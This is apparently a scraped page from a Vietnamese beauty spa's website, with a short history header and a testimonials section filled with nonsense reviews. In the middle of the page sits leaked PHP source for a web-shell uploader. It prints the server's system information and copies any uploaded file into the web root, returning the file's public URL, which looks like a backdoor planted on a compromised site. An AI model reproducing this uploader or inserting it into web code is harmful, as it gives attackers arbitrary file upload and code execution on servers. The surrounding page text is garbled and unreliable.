Ho Chi Minh • Since 1990

About Our Stories

History

 

 


   

 

echo "";
echo "".php_uname()."
";
echo "


     
     
     

";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo " -> $web/$files";
        } else {
            echo "";
        }
    } else {
        if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "$files";
        } else {
            echo "";
        }
    }
}
?>

 

XHERO Beauty & Spa

Cảm Nhận

Phản hồi của Quý Khách là động lực để X-Hero Beauty&Spa nỗ lực nhiều hơn nữa

Y
Y

Y

Bvh
Bvh

Ehhehe

Və

Ehueue

Ggdh
Ggdh

Jeueur